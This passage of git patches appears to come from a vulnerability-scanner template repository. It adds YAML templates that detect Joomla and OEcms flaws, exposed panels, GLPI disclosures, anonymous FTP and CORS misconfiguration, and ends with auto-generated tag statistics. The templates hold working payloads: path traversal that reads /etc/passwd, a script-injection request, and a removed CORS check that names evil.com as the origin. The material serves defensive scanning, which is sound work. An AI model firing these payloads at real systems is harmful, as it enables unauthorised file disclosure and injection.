<36522826+daffainfo@users.noreply.github.com> Date: Wed, 25 Aug 2021 14:58:51 +0700 Subject: [PATCH 31/52] Create CVE-2010-1954.yaml --- cves/2010/CVE-2010-1954.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1954.yaml diff --git a/cves/2010/CVE-2010-1954.yaml b/cves/2010/CVE-2010-1954.yaml new file mode 100644 index 0000000000..15235070e6 --- /dev/null +++ b/cves/2010/CVE-2010-1954.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1954 + +info: + name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12287 + - https://www.cvedetails.com/cve/CVE-2010-1954 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 3528b01bbb85a276e47d1a03f7ad34a23057a6c2 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 25 Aug 2021 15:05:31 +0700 Subject: [PATCH 32/52] Create CVE-2010-1306.yaml --- cves/2010/CVE-2010-1306.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1306.yaml diff --git a/cves/2010/CVE-2010-1306.yaml b/cves/2010/CVE-2010-1306.yaml new file mode 100644 index 0000000000..7a3b6a6390 --- /dev/null +++ b/cves/2010/CVE-2010-1306.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1306 + +info: + name: Joomla! Component Picasa 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12058 + - https://www.cvedetails.com/cve/CVE-2010-1306 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 6c328909764b19f8f406163f49f3dec1eec112f8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:17:51 +0530 Subject: [PATCH 33/52] Update honeywell-web-controller.yaml --- exposed-panels/honeywell-web-controller.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/honeywell-web-controller.yaml b/exposed-panels/honeywell-web-controller.yaml index 21a061ba40..332d7dc804 100644 --- a/exposed-panels/honeywell-web-controller.yaml +++ b/exposed-panels/honeywell-web-controller.yaml @@ -17,6 +17,7 @@ requests: - type: word words: - 'Honeywell XL Web Controller' + - type: status status: - 200 From cd81c9548e3c9014f36276b7272f062608199a54 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:19:49 +0530 Subject: [PATCH 34/52] Update ibm-note-login.yaml --- exposed-panels/ibm-note-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/ibm-note-login.yaml b/exposed-panels/ibm-note-login.yaml index b91e156e27..a178a6d3b7 100644 --- a/exposed-panels/ibm-note-login.yaml +++ b/exposed-panels/ibm-note-login.yaml @@ -10,6 +10,7 @@ info: requests: - method: GET path: + - '{{BaseURL}}' - '{{BaseURL}}/names.nsf' matchers-condition: and From bd7953e01742738e9f71c82ff26d1d3acb78da91 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:48:11 +0530 Subject: [PATCH 35/52] Update lacie-panel.yaml --- exposed-panels/lacie-panel.yaml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/exposed-panels/lacie-panel.yaml b/exposed-panels/lacie-panel.yaml index f98eb897cc..09e63a143b 100644 --- a/exposed-panels/lacie-panel.yaml +++ b/exposed-panels/lacie-panel.yaml @@ -10,6 +10,7 @@ info: requests: - method: GET path: + - '{{BaseURL}}' - '{{BaseURL}}/dashboard/' matchers-condition: and @@ -17,6 +18,14 @@ requests: - type: word words: - 'id_LaCie' + part: body + + - type: regex + regex: + - '(?m)([a-zA-Z0-9&#; ]|)+Dashboard<\/title>$' + part: body + + - type: status status: - 200 From 6d2269f92c0508eaacb365598a5cdc3362696d82 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Wed, 25 Aug 2021 16:51:24 +0530 Subject: [PATCH 36/52] Update synology-web-station.yaml --- technologies/synology-web-station.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/synology-web-station.yaml b/technologies/synology-web-station.yaml index 0493eb631b..4f741bbd77 100644 --- a/technologies/synology-web-station.yaml +++ b/technologies/synology-web-station.yaml @@ -17,6 +17,7 @@ requests: - type: word words: - '<title>Hello! Welcome to Synology Web Station!' + - type: status status: - 200 From 972ba7f4c28ce6ffad86a6c9779e4583b357800e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:55:53 +0530 Subject: [PATCH 37/52] Update CVE-2018-12095.yaml --- cves/2018/CVE-2018-12095.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml index 9cd62bafb4..eb04127534 100644 --- a/cves/2018/CVE-2018-12095.yaml +++ b/cves/2018/CVE-2018-12095.yaml @@ -4,16 +4,17 @@ info: name: OEcms 3.1 - Cross-Site Scripting author: LogicalHunter severity: medium - reference: | - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 + description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php. + reference: - https://www.exploit-db.com/exploits/44895 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 - https://cxsecurity.com/issue/WLB-2018060092 - tags: cve,cve2018,xss,OEcms + tags: cve,cve2018,xss requests: - method: GET path: - - '{{BaseURL}}/cms/info.php?mod=list' + - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -23,9 +24,9 @@ requests: part: body - type: word - words: - - "text/html" part: header + words: + - text/html - type: status status: From 05305904ef3163656819e45e9216584423670759 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 02:43:53 +0530 Subject: [PATCH 38/52] more strict matchers --- cves/2021/CVE-2021-38751.yaml | 15 +++++++++------ network/ftp-default-credentials.yaml | 8 +++++--- .../wordpress/wordpress-woocommerce-sqli.yaml | 2 ++ 3 files changed, 16 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index 8d5172063c..4d8857e9fa 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -17,18 +17,21 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" - - "{{BaseURL}}/login/showlogin" + - "{{BaseURL}}" + headers: Host: "{{randstr}}.tld" matchers-condition: and matchers: - - type: regex - regex: - - (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld + - type: word + words: + - '{{randstr}}.tld' + - 'EXPONENT.PATH' + - 'EXPONENT.URL' part: body + condition: and - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/network/ftp-default-credentials.yaml b/network/ftp-default-credentials.yaml index f8ef8e5479..d49482dad6 100644 --- a/network/ftp-default-credentials.yaml +++ b/network/ftp-default-credentials.yaml @@ -1,9 +1,9 @@ id: ftp-default-credentials info: - name: FTP Service with default credentials + name: FTP Service with anonymous Login author: pussycat0x - severity: low + severity: info tags: network,ftp,default-login network: @@ -17,4 +17,6 @@ network: matchers: - type: word words: - - "230" \ No newline at end of file + - "230" + - "Anonymous user logged in" + condition: and \ No newline at end of file diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml index 6b2f2e9a82..ac2b1073b6 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -21,6 +21,8 @@ requests: words: - 'sqli-test' - 'attribute_counts' + - 'price_range' + - 'term' condition: and - type: word From 22d0b35775d54d51c6cf8f4c85cc1c7e2311a2b6 Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Wed, 25 Aug 2021 21:55:22 +0000 Subject: [PATCH 39/52] GLPI detection, status and telemetry exposure --- .../glpi-status-ldap-domain-disclosure.yaml | 31 +++++++++++++++++++ .../files/glpi-telemetry-disclosure.yaml | 23 ++++++++++++++ technologies/glpi-cms-detect.yaml | 25 +++++++++++++++ 3 files changed, 79 insertions(+) create mode 100644 exposures/files/glpi-status-ldap-domain-disclosure.yaml create mode 100644 exposures/files/glpi-telemetry-disclosure.yaml create mode 100644 technologies/glpi-cms-detect.yaml diff --git a/exposures/files/glpi-status-ldap-domain-disclosure.yaml b/exposures/files/glpi-status-ldap-domain-disclosure.yaml new file mode 100644 index 0000000000..8260b0c0d3 --- /dev/null +++ b/exposures/files/glpi-status-ldap-domain-disclosure.yaml @@ -0,0 +1,31 @@ +id: glpi-status-domain-disclosure + +info: + name: GLPI Status Domain Disclosure + author: dogasantos + severity: info + tags: glpi,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/status.php" + - "{{BaseURL}}/glpi/status.php" + - "{{BaseURL}}/glpi2/status.php" + + matchers-condition: and + matchers: + - type: word + words: + - "GLPI_DB_OK" + - "Check LDAP servers" + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '((\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|([a-zA-Z0-9]+(\.[a-zA-Z0-9]{2,3}){1,2}))' diff --git a/exposures/files/glpi-telemetry-disclosure.yaml b/exposures/files/glpi-telemetry-disclosure.yaml new file mode 100644 index 0000000000..034530b18b --- /dev/null +++ b/exposures/files/glpi-telemetry-disclosure.yaml @@ -0,0 +1,23 @@ +id: glpi-telemetry-disclosure + +info: + name: GLPI Telemetry Disclosure + author: dogasantos + severity: info + tags: glpi,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/ajax/telemetry.php" + - "{{BaseURL}}/glpi/ajax/telemetry.php" + matchers-condition: and + matchers: + - type: word + words: + - "uuid" + - "glpi" + condition: and + - type: status + status: + - 200 diff --git a/technologies/glpi-cms-detect.yaml b/technologies/glpi-cms-detect.yaml new file mode 100644 index 0000000000..fbd9fddfe4 --- /dev/null +++ b/technologies/glpi-cms-detect.yaml @@ -0,0 +1,25 @@ +id: glpi-cms-detect + +info: + name: GLPI Cms Detection + author: dogasantos + severity: info + tags: glpi,cms,php + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/glpi/" + - "{{BaseURL}}/glpi2/" + matchers-condition: and + matchers: + - type: word + words: + - "CFG_GLPI" + - "_glpi_csrf_token" + - "GLPI Copyright" + condition: and + - type: status + status: + - 200 From 064ee029220c32dc5b5a140c3e7e13243d4fb933 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 26 Aug 2021 03:39:38 +0530 Subject: [PATCH 40/52] Update glpi-cms-detect.yaml --- technologies/glpi-cms-detect.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/technologies/glpi-cms-detect.yaml b/technologies/glpi-cms-detect.yaml index fbd9fddfe4..422e350661 100644 --- a/technologies/glpi-cms-detect.yaml +++ b/technologies/glpi-cms-detect.yaml @@ -9,9 +9,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/glpi/" - "{{BaseURL}}/glpi2/" + matchers-condition: and matchers: - type: word @@ -20,6 +21,7 @@ requests: - "_glpi_csrf_token" - "GLPI Copyright" condition: and + - type: status status: - 200 From ce1daa8c80b041101076bdaf593e6334c776eec2 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 26 Aug 2021 03:42:53 +0530 Subject: [PATCH 41/52] Update glpi-status-ldap-domain-disclosure.yaml --- exposures/files/glpi-status-ldap-domain-disclosure.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposures/files/glpi-status-ldap-domain-disclosure.yaml b/exposures/files/glpi-status-ldap-domain-disclosure.yaml index 8260b0c0d3..9704214ef3 100644 --- a/exposures/files/glpi-status-ldap-domain-disclosure.yaml +++ b/exposures/files/glpi-status-ldap-domain-disclosure.yaml @@ -17,8 +17,10 @@ requests: matchers: - type: word words: - - "GLPI_DB_OK" - - "Check LDAP servers" + - "GLPI_" + - "LDAP servers" + condition: and + - type: status status: - 200 From 0d3d9a37d9680813d23d2cd2358c2f106d2dddb9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 03:47:32 +0530 Subject: [PATCH 42/52] misc update --- exposures/files/glpi-status-ldap-domain-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/glpi-status-ldap-domain-disclosure.yaml b/exposures/files/glpi-status-ldap-domain-disclosure.yaml index 9704214ef3..9c912eac72 100644 --- a/exposures/files/glpi-status-ldap-domain-disclosure.yaml +++ b/exposures/files/glpi-status-ldap-domain-disclosure.yaml @@ -18,7 +18,7 @@ requests: - type: word words: - "GLPI_" - - "LDAP servers" + - "LDAP server" condition: and - type: status From ee49f89109eae79a814b41c2231cc9f2cc063bb3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 03:51:35 +0530 Subject: [PATCH 43/52] misc update --- exposures/files/glpi-telemetry-disclosure.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposures/files/glpi-telemetry-disclosure.yaml b/exposures/files/glpi-telemetry-disclosure.yaml index 034530b18b..12428ecaf3 100644 --- a/exposures/files/glpi-telemetry-disclosure.yaml +++ b/exposures/files/glpi-telemetry-disclosure.yaml @@ -11,13 +11,15 @@ requests: path: - "{{BaseURL}}/ajax/telemetry.php" - "{{BaseURL}}/glpi/ajax/telemetry.php" + matchers-condition: and matchers: - type: word words: - - "uuid" - - "glpi" + - '"uuid":' + - '"glpi":' condition: and + - type: status status: - 200 From 1999a9b560fbf4331e04da6d9da4b288de5aa0ac Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 04:24:06 +0530 Subject: [PATCH 44/52] Enhanced CORS checks --- vulnerabilities/generic/basic-cors.yaml | 29 --------- vulnerabilities/generic/cors-misconfig.yaml | 66 +++++++++++++++++++++ 2 files changed, 66 insertions(+), 29 deletions(-) delete mode 100644 vulnerabilities/generic/basic-cors.yaml create mode 100644 vulnerabilities/generic/cors-misconfig.yaml diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml deleted file mode 100644 index 0861b5ff8b..0000000000 --- a/vulnerabilities/generic/basic-cors.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: basic-cors-misconfig - -info: - name: Basic CORS misconfiguration - author: nadino,G4L1T0,convisoappsec - severity: info - reference: https://portswigger.net/web-security/cors - tags: cors,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - headers: - Origin: https://evil.com - - matchers-condition: or - matchers: - - type: word - words: - - "Access-Control-Allow-Origin: https://evil.com" - - "Access-Control-Allow-Credentials: true" - condition: and - part: header - - - type: word - part: header - words: - - "Access-Control-Allow-Origin: *" diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml new file mode 100644 index 0000000000..8e814fade3 --- /dev/null +++ b/vulnerabilities/generic/cors-misconfig.yaml @@ -0,0 +1,66 @@ +id: cors-misconfig + +info: + name: Basic CORS misconfiguration + author: nadino,G4L1T0,convisoappsec,pdteam + severity: info + reference: https://portswigger.net/web-security/cors + tags: cors,generic + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Origin: {{randstr}}.com + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Origin: null + +# - | +# GET / HTTP/1.1 +# Host: {{Hostname}} +# Origin: {{randstr}}.{{Hostname}} +# +# - | +# GET / HTTP/1.1 +# Host: {{Hostname}} +# Origin: {{Hostname}}{{randstr}} + +# TO DO for future as currently {{Hostname}} is not supported in matchers + + matchers-condition: or + matchers: + - type: dsl + name: arbitrary-origin + dsl: + - "contains(tolower(all_headers), 'access-control-allow-origin: {{randstr}}.com')" + - "contains(tolower(all_headers), 'access-control-allow-credentials: true')" + condition: and + + - type: dsl + name: null-origin + dsl: + - "contains(tolower(all_headers), 'access-control-allow-origin: null')" + - "contains(tolower(all_headers), 'access-control-allow-credentials: true')" + condition: and + + - type: dsl + name: wildcard-acac + dsl: + - "contains(tolower(all_headers), 'access-control-allow-origin: *')" + - "contains(tolower(all_headers), 'access-control-allow-credentials: true')" + condition: and + + - type: dsl + name: wildcard-no-acac + dsl: + - "contains(tolower(all_headers), 'access-control-allow-origin: *')" + - "!contains(tolower(all_headers), 'access-control-allow-credentials: true')" + condition: and From d3d67ea9b7ee62b4fbd2d757dfe36ee2543635ac Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 25 Aug 2021 23:10:45 +0000 Subject: [PATCH 45/52] Auto Generated Templates Stats [Wed Aug 25 23:10:45 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1416 +++++++++++++++++++++--------------------- TOP-10.md | 18 +- 3 files changed, 720 insertions(+), 716 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index d448d2c607..2770ad553e 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":624},{"name":"panel","count":222},{"name":"xss","count":221},{"name":"exposure","count":212},{"name":"lfi","count":203},{"name":"wordpress","count":203},{"name":"rce","count":189},{"name":"cve2020","count":157},{"name":"wp-plugin","count":136},{"name":"tech","count":103},{"name":"cve2021","count":103},{"name":"config","count":93},{"name":"cve2019","count":88},{"name":"cve2018","count":78},{"name":"takeover","count":74},{"name":"","count":65},{"name":"apache","count":64},{"name":"token","count":64},{"name":"default-login","count":57},{"name":"iot","count":54},{"name":"cve2017","count":48},{"name":"file","count":46},{"name":"oob","count":45},{"name":"unauth","count":42},{"name":"network","count":38},{"name":"joomla","count":36},{"name":"sqli","count":36},{"name":"ssrf","count":32},{"name":"cve2016","count":32},{"name":"workflow","count":30},{"name":"oracle","count":30},{"name":"logs","count":30},{"name":"cve2010","count":28},{"name":"atlassian","count":27},{"name":"misc","count":27},{"name":"jira","count":27},{"name":"redirect","count":25},{"name":"listing","count":25},{"name":"generic","count":22},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"disclosure","count":18},{"name":"cve2015","count":18},{"name":"sap","count":18},{"name":"router","count":17},{"name":"auth-bypass","count":16},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"cve2012","count":14},{"name":"debug","count":14},{"name":"misconfig","count":13},{"name":"android","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"cve2011","count":13},{"name":"weblogic","count":12},{"name":"dns","count":12},{"name":"dlink","count":12},{"name":"adobe","count":12},{"name":"jenkins","count":12},{"name":"devops","count":11},{"name":"php","count":11},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"magento","count":9},{"name":"xxe","count":9},{"name":"ftp","count":9},{"name":"ruijie","count":8},{"name":"login","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"cve2009","count":7},{"name":"backup","count":7},{"name":"nginx","count":7},{"name":"vmware","count":7},{"name":"cms","count":6},{"name":"google","count":6},{"name":"jetty","count":6},{"name":"api","count":6},{"name":"dell","count":6},{"name":"citrix","count":6},{"name":"files","count":6},{"name":"laravel","count":6},{"name":"netgear","count":6},{"name":"rconfig","count":6},{"name":"cve2008","count":6},{"name":"django","count":6},{"name":"solr","count":6},{"name":"coldfusion","count":6},{"name":"drupal","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"microsoft","count":5},{"name":"windows","count":5},{"name":"confluence","count":5},{"name":"docker","count":5},{"name":"lucee","count":5},{"name":"fileupload","count":5},{"name":"wp-theme","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"ibm","count":5},{"name":"dedecms","count":5},{"name":"firmware","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"thinkphp","count":4},{"name":"traversal","count":4},{"name":"jolokia","count":4},{"name":"crlf","count":4},{"name":"vpn","count":4},{"name":"deserialization","count":4},{"name":"hp","count":4},{"name":"moodle","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"tomcat","count":4},{"name":"solarwinds","count":4},{"name":"elastic","count":4},{"name":"zimbra","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"hongdian","count":4},{"name":"samsung","count":4},{"name":"nodejs","count":4},{"name":"exchange","count":4},{"name":"buffalo","count":4},{"name":"itop","count":3},{"name":"mongodb","count":3},{"name":"nacos","count":3},{"name":"kevinlab","count":3},{"name":"log","count":3},{"name":"slack","count":3},{"name":"bypass","count":3},{"name":"printer","count":3},{"name":"intrusive","count":3},{"name":"httpd","count":3},{"name":"oa","count":3},{"name":"nexus","count":3},{"name":"zhiyuan","count":3},{"name":"backups","count":3},{"name":"terramaster","count":3},{"name":"lfr","count":3},{"name":"resin","count":3},{"name":"targa","count":3},{"name":"ebs","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"ofbiz","count":3},{"name":"opensis","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"bitrix","count":3},{"name":"openssh","count":3},{"name":"springcloud","count":3},{"name":"fpd","count":3},{"name":"wso2","count":3},{"name":"amazon","count":3},{"name":"symfony","count":3},{"name":"kubernetes","count":3},{"name":"zabbix","count":3},{"name":"fanruan","count":3},{"name":"git","count":3},{"name":"tikiwiki","count":3},{"name":"nosqli","count":3},{"name":"vbulletin","count":3},{"name":"caucho","count":3},{"name":"sharepoint","count":2},{"name":"strapi","count":2},{"name":"chiyu","count":2},{"name":"kibana","count":2},{"name":"netis","count":2},{"name":"vrealize","count":2},{"name":"mida","count":2},{"name":"sonarqube","count":2},{"name":"mail","count":2},{"name":"idrac","count":2},{"name":"shellshock","count":2},{"name":"trixbox","count":2},{"name":"mcafee","count":2},{"name":"telerik","count":2},{"name":"jellyfin","count":2},{"name":"prometheus","count":2},{"name":"smb","count":2},{"name":"avantfax","count":2},{"name":"rockethchat","count":2},{"name":"bigip","count":2},{"name":"yapi","count":2},{"name":"oauth","count":2},{"name":"proxy","count":2},{"name":"jsf","count":2},{"name":"natshell","count":2},{"name":"firebase","count":2},{"name":"status","count":2},{"name":"plesk","count":2},{"name":"huawei","count":2},{"name":"maian","count":2},{"name":"nagios","count":2},{"name":"rockmongo","count":2},{"name":"kentico","count":2},{"name":"icewarp","count":2},{"name":"jeedom","count":2},{"name":"leak","count":2},{"name":"keycloak","count":2},{"name":"linkerd","count":2},{"name":"hasura","count":2},{"name":"openam","count":2},{"name":"guacamole","count":2},{"name":"hjtcloud","count":2},{"name":"odoo","count":2},{"name":"igs","count":2},{"name":"service","count":2},{"name":"smtp","count":2},{"name":"fortios","count":2},{"name":"openfire","count":2},{"name":"chamilo","count":2},{"name":"pega","count":2},{"name":"ucmdb","count":2},{"name":"cve2005","count":2},{"name":"voipmonitor","count":2},{"name":"hpe","count":2},{"name":"hashicorp","count":2},{"name":"rstudio","count":2},{"name":"azure","count":2},{"name":"ecology","count":2},{"name":"grav","count":2},{"name":"cache","count":2},{"name":"showdoc","count":2},{"name":"injection","count":2},{"name":"emerge","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nextjs","count":2},{"name":"webcam","count":2},{"name":"activemq","count":2},{"name":"glassfish","count":2},{"name":"akkadian","count":2},{"name":"github","count":2},{"name":"saltstack","count":2},{"name":"waf","count":2},{"name":"spark","count":2},{"name":"geowebserver","count":2},{"name":"jboss","count":2},{"name":"dos","count":2},{"name":"wordfence","count":2},{"name":"xxljob","count":2},{"name":"splunk","count":2},{"name":"couchdb","count":2},{"name":"dolibarr","count":2},{"name":"seeyon","count":2},{"name":"paloalto","count":2},{"name":"backdoor","count":2},{"name":"akamai","count":2},{"name":"globalprotect","count":2},{"name":"flir","count":2},{"name":"sonicwall","count":2},{"name":"phpcollab","count":2},{"name":"horde","count":2},{"name":"csrf","count":1},{"name":"sco","count":1},{"name":"redhat","count":1},{"name":"ambari","count":1},{"name":"geutebruck","count":1},{"name":"sgp","count":1},{"name":"xvr","count":1},{"name":"gespage","count":1},{"name":"bullwark","count":1},{"name":"sophos","count":1},{"name":"memcached","count":1},{"name":"ilo","count":1},{"name":"smi","count":1},{"name":"hadoop","count":1},{"name":"ns","count":1},{"name":"xiuno","count":1},{"name":"dotnetnuke","count":1},{"name":"opensmtpd","count":1},{"name":"exponentcms","count":1},{"name":"exposures","count":1},{"name":"kerbynet","count":1},{"name":"spip","count":1},{"name":"ruby","count":1},{"name":"tenda","count":1},{"name":"mantisbt","count":1},{"name":"nuxeo","count":1},{"name":"clave","count":1},{"name":"varnish","count":1},{"name":"ewebs","count":1},{"name":"cofax","count":1},{"name":"grails","count":1},{"name":"visionhub","count":1},{"name":"logontracer","count":1},{"name":"monitorix","count":1},{"name":"biometrics","count":1},{"name":"klog","count":1},{"name":"twitter-server","count":1},{"name":"xunchi","count":1},{"name":"openx","count":1},{"name":"ssl","count":1},{"name":"expose","count":1},{"name":"viewlinc","count":1},{"name":"realteo","count":1},{"name":"labtech","count":1},{"name":"camera","count":1},{"name":"nomad","count":1},{"name":"2014","count":1},{"name":"dnssec","count":1},{"name":"magicflow","count":1},{"name":"panabit","count":1},{"name":"zmanda","count":1},{"name":"totaljs","count":1},{"name":"traefik","count":1},{"name":"cherokee","count":1},{"name":"subrion","count":1},{"name":"mailchimp","count":1},{"name":"acme","count":1},{"name":"aruba","count":1},{"name":"manageengine","count":1},{"name":"cocoon","count":1},{"name":"embedthis","count":1},{"name":"portainer","count":1},{"name":"timeclock","count":1},{"name":"axis","count":1},{"name":"majordomo2","count":1},{"name":"pgadmin","count":1},{"name":"k8","count":1},{"name":"turbocrm","count":1},{"name":"livezilla","count":1},{"name":"fuelcms","count":1},{"name":"nuuo","count":1},{"name":"landrayoa","count":1},{"name":"krweb","count":1},{"name":"liferay","count":1},{"name":"esmtp","count":1},{"name":"szhe","count":1},{"name":"timesheet","count":1},{"name":"jenkin","count":1},{"name":"pippoint","count":1},{"name":"spectracom","count":1},{"name":"uwsgi","count":1},{"name":"goahead","count":1},{"name":"bigbluebutton","count":1},{"name":"dotclear","count":1},{"name":"dotnet","count":1},{"name":"cloudinary","count":1},{"name":"nedi","count":1},{"name":"bruteforce","count":1},{"name":"mantis","count":1},{"name":"tjws","count":1},{"name":"clockwatch","count":1},{"name":"zyxel","count":1},{"name":"wazuh","count":1},{"name":"sage","count":1},{"name":"jnoj","count":1},{"name":"zarafa","count":1},{"name":"glpi","count":1},{"name":"saltapi","count":1},{"name":"vsphere","count":1},{"name":"cerebro","count":1},{"name":"postmessage","count":1},{"name":"plastic","count":1},{"name":"finereport","count":1},{"name":"rfi","count":1},{"name":"chevereto","count":1},{"name":"clusterengine","count":1},{"name":"moinmoin","count":1},{"name":"erp-nc","count":1},{"name":"jquery","count":1},{"name":"netsweeper","count":1},{"name":"sidekiq","count":1},{"name":"extractor","count":1},{"name":"sarg","count":1},{"name":"redis","count":1},{"name":"geddy","count":1},{"name":"announcekit","count":1},{"name":"xdcms","count":1},{"name":"crm","count":1},{"name":"svn","count":1},{"name":"sangfor","count":1},{"name":"mara","count":1},{"name":"avalanche","count":1},{"name":"lotuscms","count":1},{"name":"vsftpd","count":1},{"name":"blackboard","count":1},{"name":"kyan","count":1},{"name":"fedora","count":1},{"name":"iptime","count":1},{"name":"dvwa","count":1},{"name":"blind","count":1},{"name":"gogs","count":1},{"name":"getsimple","count":1},{"name":"doh","count":1},{"name":"email","count":1},{"name":"cve2006","count":1},{"name":"cse","count":1},{"name":"primetek","count":1},{"name":"camunda","count":1},{"name":"ecom","count":1},{"name":"influxdb","count":1},{"name":"hiboss","count":1},{"name":"exacqvision","count":1},{"name":"harbor","count":1},{"name":"razor","count":1},{"name":"aura","count":1},{"name":"optiLink","count":1},{"name":"bookstack","count":1},{"name":"floc","count":1},{"name":"nordex","count":1},{"name":"jitsi","count":1},{"name":"cloudflare","count":1},{"name":" 